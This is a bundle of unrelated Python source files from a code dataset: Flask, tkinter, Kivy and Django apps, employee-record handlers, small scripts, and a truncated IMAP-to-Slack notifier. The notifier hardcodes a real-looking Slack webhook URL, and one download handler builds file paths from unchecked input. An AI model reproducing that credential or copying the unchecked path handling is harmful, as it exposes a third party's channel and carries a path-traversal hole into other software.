redirect(url_for('articles'))\n    return render_template('articles.html', articles=article_list)\n\n@app.route(\"/articles/new\")\ndef add_article():\n    return render_template('add_article.html')\n\n@app.route('/articles/<int:id>', methods=['GET', 'PATCH', 'DELETE'])\ndef show_article(id):\n    found_article = [art for art in article_list if art.id == id][0]\n    # use r'METHOD' if patch request were not handled correctly\n    if request.method == 'PATCH':\n        found_article.author = request.form['author']\n        found_article.content = request.form['content']\n        return redirect(url_for('articles'))\n    if request.method == 'DELETE':\n        article_list.remove(found_article)\n        return redirect(url_for('articles'))\n    return render_template('show_article.html', article=found_article)\n\n@app.route('/articles/<int:id>/edit')\ndef edit_article(id):\n    found_article = [art for art in article_list if art.id == id][0]\n    return render_template('edit_article.html', article=found_article)\n\n@app.route(\"/form\")\ndef form():\n    return render_template('form.html')\n\n@app.route('/courses', methods=['GET', 'POST'])\ndef courses():\n    if request.method == 'POST':\n        new_course = Course(request.form['name'], request.form['teacher'], request.form['duration'])\n        course_list.append(new_course)\n        return redirect(url_for('courses'))\n    return render_template('courses.html', courses=course_list)\n\n@app.route('/courses/new')\ndef add_course():\n    return render_template('add_course.html')\n\n@app.route('/courses/<int:id>', methods=['GET', 'DELETE', 'PATCH'])\ndef edit_course(id):\n    found_course = [cor for cor in course_list if cor.id == id][0]\n    if request.method == 'DELETE':\n        course_list.remove(found_course)\n        return redirect(url_for('courses'))\n    if request.method == 'PATCH':\n        found_course.name = request.form['name']\n        found_course.teacher = request.form['teacher']\n        found_course.duration = request.form['duration']\n        return redirect(url_for('courses'))\n    return render_template('edit_course.html', course=found_course)\n\n\nif __name__ == '__main__':\n    app.run(debug=True, host='127.0.0.1', port='3000')","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
+{"seq_id":"475235469","text":"import tkinter as tk\nimport data\n\nclass gui():\n    def __init__(self):\n#setup window\n        self.root = tk.Tk()\n        self.root.title(\"集成曲谱曲牌检索 v1.0\")\n        self.root.configure(bg=\"#f3df99\")\n        X = int(self.root.winfo_screenwidth())-800\n        Y = int(self.root.winfo_screenheight())-600\n        self.root.minsize(785,520)\n        self.root.geometry(\"785x520+%d+%d\" % (X/2, Y/2))\n#title frame\n        self.titleframe=tk.Frame(self.root)\n        self.titleframe.grid(row=0,column=0,columnspan=8,sticky=\"W\",padx=60)\n        self.titleframe.config(bg=\"#f3df99\")\n\n        self.labelA=tk.Label(self.titleframe,text=\"集成曲谱曲牌检索\",font=(\"ss\",\"13\",\"bold\"))\n        self.labelA.grid(row=0,column=0,columnspan=4,pady=20)\n        self.labelA.configure(background=\"#f3df99\")\n        self.labelB=tk.Label(self.titleframe,text=\"根据《螾庐曲谈·卷三》整理录入 by 乱煞年光遍\")\n        self.labelB.configure(background=\"#f3df99\")\n        self.labelB.grid(row=1,column=1,columnspan=5,padx=40)\n\n#search frame\n        self.searchframe=tk.Frame(self.root)\n        self.searchframe.grid(row=1,column=0,pady=15,columnspan=8,padx=10)\n        self.searchframe.config(bg=\"#f3df99\")\n\n        self.label1=tk.Label(self.searchframe,text=\"宫调\",width=12)\n        self.label1.configure(background=\"#f3df99\")\n        self.label1.grid(row=3,column=1)\n        self.label2=tk.Label(self.searchframe,text=\"性质\",width=12)\n        self.label2.configure(background=\"#f3df99\")\n        self.label2.grid(row=3,column=2)\n        self.label3=tk.Label(self.searchframe,text=\"曲牌\",width=12)\n        self.label3.configure(background=\"#f3df99\")\n        self.label3.grid(row=3,column=3)\n        self.label4=tk.Label(self.searchframe,text=\"剧目\",width=12)\n        self.label4.configure(background=\"#f3df99\")\n        self.label4.grid(row=3,column=4)\n        self.label5=tk.Label(self.searchframe,text=\"折子\",width=12)\n        self.label5.configure(background=\"#f3df99\")\n        self.label5.grid(row=3,column=5)\n        self.label6=tk.Label(self.searchframe,text=\"位置\",width=12)\n        self.label6.configure(background=\"#f3df99\")\n        self.label6.grid(row=3,column=6)\n\n        self.entry1=tk.Entry(self.searchframe,width=10)\n        self.entry1.grid(row=4,column=1)\n        self.entry2=tk.Entry(self.searchframe,width=10)\n        self.entry2.grid(row=4,column=2)\n        self.entry3=tk.Entry(self.searchframe,width=10)\n        self.entry3.grid(row=4,column=3)\n        self.entry4=tk.Entry(self.searchframe,width=10)\n        self.entry4.grid(row=4,column=4)\n        self.entry5=tk.Entry(self.searchframe,width=10)\n        self.entry5.grid(row=4,column=5)\n        self.entry6=tk.Entry(self.searchframe,width=10)\n        self.entry6.grid(row=4,column=6)\n#searchbutton\n        self.button=tk.Button(self.searchframe,text=\" 搜  索 \",width=8,command=lambda: 
self.searchdata(self.entry1.get(),self.entry2.get(),self.entry3.get(),self.entry4.get(),self.entry5.get(),self.entry6.get()))\n self.button.config(bg=\"#814713\",fg=\"white\")\n self.button.grid(row=3,column=7,sticky=\"W\"+\"S\",rowspan=2,padx=25)\n \n#example frame\n self.exframe=tk.Frame(self.root)\n self.exframe.grid(row=2,column=0,columnspan=20,pady=40,padx=34,rowspan=9)\n self.exframe.config(bg=\"#f3df99\")\n \n self.flabel00=tk.Label(self.exframe,text=\"示例\",font=(\"ss\",\"11\",\"bold\"),width=15)\n self.flabel00.configure(bg=\"#f3df99\")\n self.flabel00.grid(row=0,column=0,sticky=\"W\")\n self.flabel0=tk.Label(self.exframe,text=\"序号\t宫调\t性质\t曲牌\t剧目\t折子\t位置\",width=58)\n self.flabel0.configure(bg=\"#f3df99\")\n self.flabel0.grid(row=1,column=0,sticky=\"W\",pady=5)\n self.flabel1=tk.Label(self.exframe,text=\"0010\t仙吕宫\t南引子\t番卜算\t燕子笺\t拾笺\t振五\",width=58)\n self.flabel1.configure(bg=\"#f3df99\")\n self.flabel1.grid(row=2,column=0,sticky=\"W\")\n self.flabel1=tk.Label(self.exframe,text=\"0044\t仙吕宫\t南过曲\t月儿高\t白罗衫\t游园\t振八\",width=58)\n self.flabel1.configure(bg=\"#f3df99\")\n self.flabel1.grid(row=3,column=0,sticky=\"W\")\n self.flabel1=tk.Label(self.exframe,text=\"0061\t仙吕宫\t南过曲\t醉扶归\t牡丹亭\t游园\t声四\",width=58)\n self.flabel1.configure(bg=\"#f3df99\")\n self.flabel1.grid(row=4,column=0,sticky=\"W\")\n self.flabel3=tk.Label(self.exframe,text=\"0372\t南吕宫\t南过曲\t一江风\t西楼记\t拆书\t金六\",width=58)\n self.flabel3.configure(bg=\"#f3df99\")\n self.flabel3.grid(row=5,column=0,sticky=\"W\") \n self.flabel4=tk.Label(self.exframe,text=\"0373\t南吕宫\t南过曲\t一江风\t荆钗记\t绣房\t声二\",width=58)\n self.flabel4.configure(bg=\"#f3df99\")\n self.flabel4.grid(row=6,column=0,sticky=\"W\")\n self.flabel5=tk.Label(self.exframe,text=\"0500\t南吕宫\t南集曲\t罗江怨\t西楼记\t楼会\t金六\",width=58)\n self.flabel5.configure(bg=\"#f3df99\")\n self.flabel5.grid(row=7,column=0,sticky=\"W\")\n self.flabel5=tk.Label(self.exframe,text=\"0534\t南吕宫\t北曲\t乌夜啼\t铁冠图\t守门\t玉六\",width=58)\n self.flabel5.configure(bg=\"#f3df99\")\n self.flabel5.grid(row=8,column=0,sticky=\"W\")\n#picture\n photo=tk.PhotoImage(file=\"pic.asd\")\n self.labelp=tk.Label(self.exframe,image=photo)\n self.labelp.image = photo\n self.labelp.configure(background=\"#f3df99\")\n self.labelp.grid(row=0,column=1,sticky=\"N\"+\"W\",pady=10,rowspan=50,padx=20)\n\n\n def MainLoop(self):\n self.root.mainloop()\n\n\n def searchdata(self,a,b,c,d,e,f):\n self.clear()\n a=str(a)\n b=str(b)\n c=str(c)\n d=str(d)\n e=str(e)\n f=str(f)\n#textframe\n self.textframe=tk.Frame(self.root)\n self.textframe.grid(row=2,column=0,rowspan=20,columnspan=20,padx=45)\n self.textframe.configure(bg=\"#f3df99\")\n \n self.text=tk.Text(self.textframe,width=57,height=25)\n self.text.grid(row=1,column=0,columnspan=8)\n self.scrollbar=tk.Scrollbar(self.textframe)\n self.scrollbar.grid(row=1,column=8,sticky=\"N\"+\"S\")\n self.scrollbar.config(command=self.text.yview,troughcolor=\"#814713\")\n self.text.config(yscrollcommand=self.scrollbar.set,bg=\"#f3e7bf\")\n self.labelaa=tk.Label(self.textframe,text=\"序 号\")\n self.labelaa.grid(row=0,column=0,sticky=\"W\")\n self.labelaa.config(bg=\"#f3df99\")\n self.labela=tk.Label(self.textframe,text=\" 宫 调\")\n self.labela.grid(row=0,column=1,sticky=\"W\")\n self.labela.config(bg=\"#f3df99\")\n self.labelb=tk.Label(self.textframe,text=\"性 质\")\n self.labelb.grid(row=0,column=2,sticky=\"W\")\n self.labelb.config(bg=\"#f3df99\")\n self.labelc=tk.Label(self.textframe,text=\" 曲 牌\")\n self.labelc.grid(row=0,column=3,sticky=\"W\")\n self.labelc.config(bg=\"#f3df99\")\n 
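The PATCH/DELETE routes in the app.py record further above only fire because flask_modus rewrites an ordinary POST; a client-side sketch, assuming flask-modus's usual ?_method= override convention and the server running locally on port 3000 as configured in the snippet:

import requests

base = 'http://127.0.0.1:3000'
# browsers can only GET/POST, so the edit form POSTs with ?_method=PATCH appended
requests.post(base + '/articles/1', params={'_method': 'PATCH'},
              data={'author': 'New Author', 'content': 'Updated text'})
requests.post(base + '/articles/1', params={'_method': 'DELETE'})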
self.labele=tk.Label(self.textframe,text=\"剧 目\")\n self.labele.grid(row=0,column=4,sticky=\"W\")\n self.labele.config(bg=\"#f3df99\")\n self.labeld=tk.Label(self.textframe,text=\"折子 \")\n self.labeld.grid(row=0,column=5,sticky=\"W\")\n self.labeld.config(bg=\"#f3df99\")\n self.labele=tk.Label(self.textframe,text=\"位置\")\n self.labele.grid(row=0,column=6,sticky=\"W\")\n self.labele.config(bg=\"#f3df99\")\n#picture\n photo=tk.PhotoImage(file=\"pic.asd\")\n self.labelp=tk.Label(self.textframe,image=photo)\n self.labelp.image = photo\n self.labelp.configure(background=\"#f3df99\")\n self.labelp.grid(row=0,column=9,sticky=\"N\"+\"W\",pady=50,rowspan=10,padx=1)\n \n\n search_dic=data.datas()\n result=search_dic.final(a,b,c,d,e,f)\n for ele in result:\n for item in ele[1]:\n item=item+\"\\t\"\n self.text.insert(tk.END,item)\n self.text.insert(tk.END,\"\\n\")\n self.text.config(state=\"disabled\")\n\n \n \n def clear(self):\n self.exframe.grid_remove()\n self.entry1.delete(0,tk.END)\n self.entry2.delete(0,tk.END)\n self.entry3.delete(0,tk.END)\n self.entry4.delete(0,tk.END)\n self.entry5.delete(0,tk.END)\n self.entry6.delete(0,tk.END)\n","sub_path":"basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":8317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"607994826","text":"#!/usr/bin/env python\r\n\r\nimport os\r\n\r\nfrom kivy.metrics import dp\r\nfrom kivy.uix.floatlayout import FloatLayout\r\nfrom kivy.uix.gridlayout import GridLayout\r\nfrom kivy.uix.image import Image\r\nfrom kivy.uix.label import Label\r\nfrom kivy.uix.popup import Popup\r\nfrom kivy.uix.tabbedpanel import TabbedPanel, TabbedPanelHeader\r\n\r\nfrom amgineirc.view.settings.settingsView import SettingsView\r\nfrom amgineirc.view.channels.connectionsView import ConnectionsView\r\nfrom amgineirc.viewModel.appViewModel import AppViewModel\r\n\r\nclass AppView(FloatLayout):\r\n connected_string = 'Connected'\r\n not_connected_string = 'Not Connected'\r\n connected_fg = [0.0, 1.0, 0.0, 1.0] # green\r\n not_connected_fg = [1.0, 0.0, 0.0, 1.0] # red\r\n\r\n def __init__(self, appdata):\r\n FloatLayout.__init__(self, size_hint=(1.0, 1.0))\r\n # upper view\r\n self.upper_view = _AppUpperView(appdata,\r\n tab_height=dp(60),\r\n tab_width=dp(250),\r\n do_default_tab=True,\r\n default_tab_text='AmgineIRC',\r\n default_tab_content = self._build_about_app_content(appdata),\r\n size_hint=(1.0, 0.9),\r\n pos_hint={'x':0.0, 'y':0.1})\r\n self.add_widget(self.upper_view)\r\n # lower view\r\n self._lower_view = _AppLowerView(appdata,\r\n size_hint=(1.0, 0.1),\r\n pos_hint={'x':0.0, 'y':0.0})\r\n self.add_widget(self._lower_view)\r\n self.set_status_bar(False)\r\n AppViewModel(self, appdata)\r\n\r\n def _build_about_app_content(self, appdata):\r\n # image\r\n src = os.path.join(appdata['app'].directory, 'amgineirc_IRC_dessert.png')\r\n image = Image(source=src)\r\n # text (name and version)\r\n label = Label(text='', markup=True)\r\n sizei = label.font_size * 2\r\n sizes = '[size=%i]' % (sizei)\r\n letters = [sizes,\r\n '[color=b08c62]A[/color]',\r\n '[color=b08c62]m[/color]',\r\n '[color=b08c62]g[/color]',\r\n '[color=b08c62]i[/color]',\r\n '[color=b08c62]n[/color]',\r\n '[color=b08c62]e[/color]',\r\n '[color=82c477]I[/color]',\r\n '[color=82c477]R[/color]',\r\n '[color=82c477]C[/color]',\r\n '[/size]']\r\n name = ''.join(letters)\r\n version = 'Version %i.%i.%i' % (appdata['version']['major'],\r\n appdata['version']['minor'],\r\n appdata['version']['bugfix'])\r\n text = 
'%s %s' % (name, version)\r\n label.text = text\r\n layout = GridLayout(cols=1, padding=20)\r\n layout.add_widget(image)\r\n layout.add_widget(label)\r\n return layout\r\n \r\n\r\n def set_status_bar(self, connected):\r\n if connected == True:\r\n self._lower_view.text=AppView.connected_string\r\n self._lower_view.color=AppView.connected_fg\r\n else:\r\n self._lower_view.text=AppView.not_connected_string\r\n self._lower_view.color=AppView.not_connected_fg\r\n\r\nclass _AppLowerView(Label):\r\n def __init__(self, appdata, **kargs):\r\n kargs['text'] = u''\r\n Label.__init__(self, **kargs)\r\n\r\n\r\nclass _AppUpperView(TabbedPanel):\r\n \"\"\"this class does not have a view model\r\n its pages have their own view models\r\n \"\"\"\r\n\r\n settings_page_label = 'Configuration'\r\n connections_page_label = 'Connections'\r\n\r\n def __init__(self, appdata, **kargs):\r\n TabbedPanel.__init__(self, **kargs)\r\n # add the settings tab\r\n self._settings_th = TabbedPanelHeader(text=_AppUpperView.settings_page_label)\r\n self._settings_th.content = SettingsView(appdata,\r\n tab_width=dp(200))\r\n self.add_widget(self._settings_th)\r\n # add the connections tab\r\n self._connections_th = TabbedPanelHeader(text=_AppUpperView.connections_page_label)\r\n self.connections_view = ConnectionsView(appdata,\r\n tab_height=40,\r\n tab_width=200)\r\n self._connections_th.content = self.connections_view\r\n self.add_widget(self._connections_th)\r\n\r\n def raise_connections_page(self):\r\n self.switch_to(self._connections_th)\r\n","sub_path":"windows/amgineirc/view/appView.py","file_name":"appView.py","file_ext":"py","file_size_in_byte":4628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"381954921","text":"from django.urls import include, path\n\nfrom .views import ProfileRetrieveAPIView, ProfileFollowAPIView, \\\n FollowersAPIView, FollowingAPIView, ProfileList\n\napp_name = 'profiles'\nurlpatterns = [\n path('', ProfileRetrieveAPIView.as_view()),\n path('', ProfileList.as_view()),\n path('/follow', ProfileFollowAPIView.as_view()),\n path('/following', FollowingAPIView.as_view()),\n path('/followers', FollowersAPIView.as_view()),\n] ","sub_path":"authors/apps/profiles/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"449710274","text":"\nimport com.ihsan.foundation.pobjecthelper as phelper\nimport time, sys, os\nimport PIL.Image as Image\n\ndef formSetDataEx(UIDefList, Parameter):\n if Parameter.DatasetCount == 0: return\n config = UIDefList.config\n helper = phelper.PObjectHelper(config)\n par = Parameter.FirstRecord\n key = par.Key\n UIDefList.SetData('uiEmp', key)\n EmpId = key.split('=')[1]\n config = UIDefList.config\n helper = phelper.PObjectHelper(config)\n Employ = helper.GetObject('Employee',EmpId)\n\n recE = UIDefList.uiEmp.Dataset.GetRecord(0)\n recE.PositionId = Employ.LWorkUnitPosition.LPosition.Description\n recE.WorkUnitId = Employ.LWorkUnitPosition.LWorkUnit.Description\n\n individu='PObj:INDIVIDU#INDIVIDUID=%d' % (Employ.IndividuId)\n UIDefList.SetData('uipart', individu)\n\n FE = UIDefList.GetPClassUIByName('uiFormal')\n sSQL = \"select * from education a, formaleducation b \"\n sSQL +=\"where a.educationid=b.educationid and a.individuid=%s \" % Employ.IndividuId\n res = config.CreateSQL(sSQL).RawResult\n res.First()\n while not res.Eof:\n recItem = FE.Dataset.AddRecord()\n recItem.EduYear = res.EduYear\n 
recItem.EduInstitution = res.EduInstitution\n recItem.EducationName = res.EducationName\n recItem.Alamat = res.Alamat\n recItem.Nilai = res.Nilai\n recItem.Description = res.Description\n recItem.Fakultas = res.Fakultas\n recItem.Jurusan = res.Jurusan\n res.Next()\n\n NFE = UIDefList.GetPClassUIByName('uiNonformal')\n sSQL = \"select * from education a, nonformaleducation b \"\n sSQL +=\"where a.educationid=b.educationid and a.individuid=%s \" % Employ.IndividuId\n res = config.CreateSQL(sSQL).RawResult\n res.First()\n while not res.Eof:\n recItem = NFE.Dataset.AddRecord()\n recItem.EduYear = res.EduYear\n recItem.EduInstitution = res.EduInstitution\n recItem.EducationName = res.EducationName\n recItem.Alamat = res.Alamat\n recItem.Description = res.Description\n res.Next()\n\n TS = UIDefList.GetPClassUIByName('uiTraining')\n sSQL = \"select * from training a, trainingseminar b \"\n sSQL +=\"where a.trainingid=b.trainingid and a.individuid=%s \" % Employ.IndividuId\n res = config.CreateSQL(sSQL).RawResult\n res.First()\n while not res.Eof:\n recItem = TS.Dataset.AddRecord()\n recItem.Year = res.Year\n recItem.Institution = res.Institution\n recItem.Materi = res.Materi\n recItem.Status = res.Status\n res.Next()\n\ndef OnSetData(sender):\n config =sender.UIDefList.config\n Data = sender.ActiveRecord\n Data.JamDatang = config.FormatDateTime('hh:mm:ss',Data.ArriveTime)\n Data.JamPulang = config.FormatDateTime('hh:mm:ss',Data.ReturnTime)\n\ndef GetImg(config, parameter, returnpacket):\n imgdir = config.GetGlobalSetting('IMAGEHOMEDIR')\n foto1 = parameter.FirstRecord.foto1\n foto2 = parameter.FirstRecord.foto2\n foto3 = parameter.FirstRecord.foto3\n #raise '',foto1\n if foto1 not in [None,'',0]:\n sw = returnpacket.AddStreamWrapper()\n sw.Name = foto1\n sw.LoadFromFile(imgdir+\"\\\\Profil\\\\\"+foto1)\n if foto2 not in [None,'',0]:\n sw = returnpacket.AddStreamWrapper()\n sw.Name = foto2\n sw.LoadFromFile(imgdir+\"\\\\Tanda Tangan\\\\\"+foto2)\n if foto3 not in [None,'',0]:\n sw = returnpacket.AddStreamWrapper()\n sw.Name = foto3\n sw.LoadFromFile(imgdir+\"\\\\Paraf\\\\\"+foto3)\n\ndef DLFile(config,parameters,returns):\n status = returns.CreateValues(\n ['IsErr',0],\n ['ErrMessage',''],\n ['StreamName',''],\n )\n file = parameters.FirstRecord.file\n jenis = parameters.FirstRecord.jenis\n helper = phelper.PObjectHelper(config)\n config.BeginTransaction()\n try:\n HomeDir = config.GetGlobalSetting('FILEHOMEDIR')\n FileTarget =HomeDir+ jenis +file\n\n sw = returns.AddStreamWrapper()\n sw.Name = 'TF'\n sw.LoadFromFile(FileTarget)\n #sw.MIMEType = config.AppObject.GetMIMETypeFromExtension(FileTarget)\n sw.MIMEType = 'applications/vnd.pdf'\n\n config.Commit()\n except:\n config.Rollback()\n status.IsErr = 1\n status.ErrMessage = str(sys.exc_info()[1])\n\n\n","sub_path":"dialogs/karyawan/fViewPersonalEmployee2_data.py","file_name":"fViewPersonalEmployee2_data.py","file_ext":"py","file_size_in_byte":4174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"639903310","text":"# palindrome.py\n# This program reads strings from the\n# user and says which are palindromes#\n#\n# Prof Geitz/class/me\n# 15 February 2016\n\n\n\ndef Reverse(s):\n # This returns the reversal of string s\n rev = \"\"\n for letter in s:\n rev = letter + rev # rev + letter would give forwards!\n return rev # So we don't get \"none\" bug\n\ndef IsPalindrome(s):\n if s == Reverse(s):\n return True\n else:\n return False\n\ndef RemoveSpaces(s):\n # This returns a new string just like 
s but with no spaces\n    alphabet = \"abcdefghijklmnopqrstuvwxyz\"\n    result = \"\"\n    for char in s:\n        if char in alphabet:\n            # if char != \" \": <-- when we just regExed for spaces\n            result = result+char\n    return result\n\ndef main():\n    done = False\n    while not done:\n        string = input( \"Give me a string: \")\n        if string == \"\":\n            done = True\n        else:\n            if IsPalindrome(RemoveSpaces(string.lower())):\n                # Prints capital if \"Bob\" but checks on \"bob\"\n                # and calls RemoveSpaces on lower alphabet ;)\n                print( \"Yep, '%s' is a palindrome.\"%string )\n            else:\n                print( \"Not a palindrome.\" )\n\nmain()\n","sub_path":"Class/Lecture 7/palindrome.py","file_name":"palindrome.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
+{"seq_id":"209025589","text":"'''\nThis script uses an AI model to pre-generate label files into a target directory,\nmaking manual labeling faster and more convenient.\n\ninput : directory of the images to inspect; the image extension must be .bmp\noutput: produces label (.xml) and mask (.bmp) files\n'''\n\n'''\nupdate issue:\n\n'''\n\n# ---python package---\nimport os\nimport cv2\nimport glob\nimport numpy as np\nimport shutil\n# ---custom classes---\nfrom make_xml import create_xml\nfrom Detector import CP_Detection\n\n# np.random.seed(1)\ndetect_path = \"D:/AOI/PMI_Project_dataset/total/image/\" + \"*.bmp\" # directory of images that need labeling\noutput_path = \"D:/AOI/Label/\" # output location\n\n# If the location set by output_path already exists, delete it,\n# then recreate output_path and create \"mask\" and \"xml\" folders under it\nif os.path.exists(output_path):\n    shutil.rmtree(output_path)\nos.mkdir(output_path)\nfor f in [\"mask\", \"xml\"]:\n    if not os.path.exists(os.path.join(output_path, f)):\n        os.mkdir(os.path.join(output_path, f))\n\ndetector = CP_Detection(mode=\"ai\") # detector runs the AI model; provides denoise, inference and detect\n\nfile_list = list(glob.glob(detect_path))\n# index = np.random.randint(0, len(file_list), 10000)\nfile_list = np.array(file_list)\n# run_list = file_list[index]\nrun_list = file_list[:] # list the file paths of all test images\n\nfor file_name in run_list:\n    image = cv2.imread(file_name) # read the image\n    show_image = image.copy()\n\n    process_image = show_image.copy()\n    process_image = cv2.cvtColor(process_image, cv2.COLOR_BGR2GRAY) # BGR to Gray\n    process_image = detector.denoise(process_image) # noise suppression\n\n    pad_coordinates, pin_coordinate_list = detector.inference(process_image) # detect pads (pad_coordinates) and probe marks (pin_coordinate_list)\n\n    # draw the detected pads and probe marks\n    for b_coord in pad_coordinates:\n        show_image = cv2.rectangle(show_image, tuple(b_coord[0:2]), tuple(b_coord[2:5]), (255, 0, 0), 1)\n\n    for p_coord in pin_coordinate_list:\n        show_image = cv2.rectangle(show_image, tuple(p_coord[0:2]), tuple(p_coord[2:5]), (0, 0, 255), 1)\n\n    # save the annotated image into the \"mask\" folder of the target directory\n    # and the label information into the \"xml\" folder\n    create_xml(output_path + \"/xml\", os.path.basename(file_name), process_image.shape, pin_coordinate_list, pad_coordinates)\n    cv2.imwrite(os.path.join(output_path, \"mask\", os.path.basename(file_name)), show_image)\n\n","sub_path":"make_dataset_by_ai.py","file_name":"make_dataset_by_ai.py","file_ext":"py","file_size_in_byte":2400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
+{"seq_id":"485502557","text":"# coding=utf-8\nfrom google.appengine.api.app_identity import get_default_version_hostname\nfrom google.appengine.ext.blobstore import BlobReader, BlobInfo, BlobKey\nfrom utils.blob_iterator import BlobIterator\nfrom utils.general import ResponseException\nfrom datetime import datetime\nimport webapp2\nimport logging\nimport json\nimport csv\n\n\nclass BaseService(webapp2.RequestHandler):\n\n    def __init__(self, 
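Reverse() in the palindrome.py record above builds the reversal one character at a time; Python's extended slice does the same in one step, collapsing IsPalindrome to a single comparison (a sketch with identical behavior):

def Reverse(s):
    return s[::-1]  # a step of -1 walks the string backwards

def IsPalindrome(s):
    return s == s[::-1]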
request, response):\n super(BaseService, self).__init__(request, response)\n self.start_time = datetime.today()\n self.result_string = ''\n self.debug = False\n self.resp = {}\n self.id = self.request.get('id')\n self.user_id = self.request.get('user_id')\n self.all = self.request.get('all')\n self.in_day = self.request.get('in_day')\n self.keys = None\n self.json = None\n if not hasattr(self, 'blobstore') or self.request.method == 'PUT':\n self.parse_json()\n self.log_name()\n self.set_debug()\n self.host = get_default_version_hostname()\n self.blob_info = None\n\n def log_name(self):\n if hasattr(self, 'service_name'):\n logging.info('%s.%s' % (self.service_name, self.request.method))\n else:\n logging.info('%s.%s' % (repr(self), self.request.method))\n\n def handle_exception(self, exception, model):\n logging.error({\"error\": str(exception.message)})\n self.response.status = 500\n\n if self.blob_info:\n logging.info('deleting blob: %s' % self.blob_info.filename)\n self.blob_info.delete()\n\n if isinstance(exception, ResponseException):\n self.response.out.write(json.dumps({\"error\": exception.message}))\n else:\n self.response.out.write(json.dumps({\"error\": 'server: %s' % exception.message}))\n\n def parse_json(self):\n\n if not self.request.method in ['PUT', 'POST']:\n return None\n\n try:\n body = self.request.body\n logging.info('body: %s' % body)\n self.json = json.loads(body)\n if isinstance(self.json, dict):\n self.keys = self.json.keys()\n if 'payload' in self.keys:\n self.payload = self.json['payload']\n\n except Exception as e:\n pass\n\n def format_resp(self):\n\n self.response.headers['Content-Type'] = 'application/json'\n\n if self.result_string:\n self.response.headers['Content-Type'] = 'text/plain'\n resp = self.result_string\n\n elif self.resp is not None:\n resp = json.dumps(self.resp)\n\n else:\n logging.error('format response type failure')\n self.response.out.write('format response type failure')\n return\n\n logging.info(resp)\n logging.info('request time: %s ' % str((datetime.today() - self.start_time)))\n self.response.out.write(resp)\n\n def set_debug(self):\n if 'localhost' in self.request.server_name or self.request.get('debug') == 'true':\n self.debug = True\n\n def get_reader(self, blobkey):\n\n blob_reader = BlobReader(blobkey)\n blob_iterator = BlobIterator(blob_reader)\n\n reader = csv.DictReader(\n blob_iterator,\n doublequote=True,\n escapechar='\\\\'\n )\n\n if isinstance(blobkey, str):\n logging.info('file: %s' % BlobInfo(BlobKey(blobkey)).filename)\n\n else:\n logging.info('file: %s' % BlobInfo(blobkey).filename)\n\n return reader\n\n def convertKey(self, value):\n try:\n key = int(value)\n return key\n except ValueError:\n return value\n\n","sub_path":"base/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":3700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"459738221","text":"from slic.devices.general.motor import Motor\nfrom ..general.detectors import CameraCA, CameraBS\nfrom slic.utils.eco_components.aliases import Alias, append_object_to_object\nfrom slic.core.adjustable import PVEnumAdjustable\n\n# from ..devices_general.epics_wrappers import EnumSelector\nfrom epics import PV\nfrom slic.utils.eco_epics.utilities_epics import EnumWrapper\n\n\ndef addMotorToSelf(self, Id=None, name=None):\n self.__dict__[name] = Motor(Id, name=name)\n self.alias.append(self.__dict__[name].alias)\n\n\nclass Pprm:\n\n def __init__(self, Id, name=None):\n self.Id = Id\n self.name = 
name\n self.target_pos = Motor(Id + \":MOTOR_PROBE\", name=\"target_pos\")\n self.cam = CameraCA(Id)\n self.led = PVEnumAdjustable(self.Id + \":LED\", name=\"led\")\n self.target = PVEnumAdjustable(self.Id + \":PROBE_SP\", name=\"target\")\n if name:\n self.alias = Alias(name)\n self.alias.append(self.target_pos.alias)\n self.alias.append(self.target.alias)\n self.alias.append(self.led.alias)\n\n def movein(self, target=1):\n self.target.set_target_value(target)\n\n def moveout(self, target=0):\n self.target.set_target_value(target)\n\n def __repr__(self):\n s = f\"**Profile Monitor {self.name}**\\n\"\n s += f\"Target in beam: {self.target.get_current_value().name}\\n\"\n return s\n\n\nclass Bernina_XEYE:\n\n def __init__(self, camera_pv=None, zoomstage_pv=None, bshost=None, bsport=None, name=None):\n self.alias = Alias(name)\n self.name = name\n if zoomstage_pv:\n append_object_to_object(self, Motor, zoomstage_pv, name=\"zoom\")\n try:\n self.cam = CameraCA(camera_pv)\n except:\n print(\"X-Ray eye Cam not found\")\n pass\n\n if bshost:\n self.camBS = CameraBS(host=bshost, port=bsport)\n\n def get_adjustable_positions_str(self):\n ostr = \"*****Xeye motor positions******\\n\"\n\n for tkey, item in self.__dict__.items():\n if hasattr(item, \"get_current_value\"):\n pos = item.get_current_value()\n ostr += \" \" + tkey.ljust(17) + \" : % 14g\\n\" % pos\n return ostr\n\n def __repr__(self):\n return self.get_adjustable_positions_str()\n\n\n# self._led = PV(self.Id+':LED')\n\n\n# def illuminate(self,value=None):\n# if value:\n# self._led.put(value)\n# else:\n# self._led.put(\n# not self.get_illumination_state())\n#\n# def get_illumination_state(self):\n# return bool(self._led.get())\n#\n\n\n\n","sub_path":"slic/devices/xdiagnostics/profile_monitors_new.py","file_name":"profile_monitors_new.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"619408838","text":"import imaplib\nimport email\nfrom email import policy \nimport requests\nimport json\n\nslack_webhook_url = \"https://hooks.slack.com/services/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\"\n\ndef sendSlackWebhook(strText):\n headers = {\n \"Content-type\": \"application/json\"\n }\n\n data = {\n \"text\" : strText\n }\n\n res = requests.post(slack_webhook_url, headers=headers, data=json.dumps(data))\n \n if res.status_code == 200:\n return \"ok\"\n else:\n return \"error\"\n\ndef find_encoding_info(txt): \n info = email.header.decode_header(txt)\n subject, encode = info[0]\n return subject, encode\n\nimap = imaplib.IMAP4_SSL('imap.naver.com')\nid = '아이디'\npw = '비밀번호'\nimap.login(id, pw)\n\nimap.select('INBOX')\nresp, data = 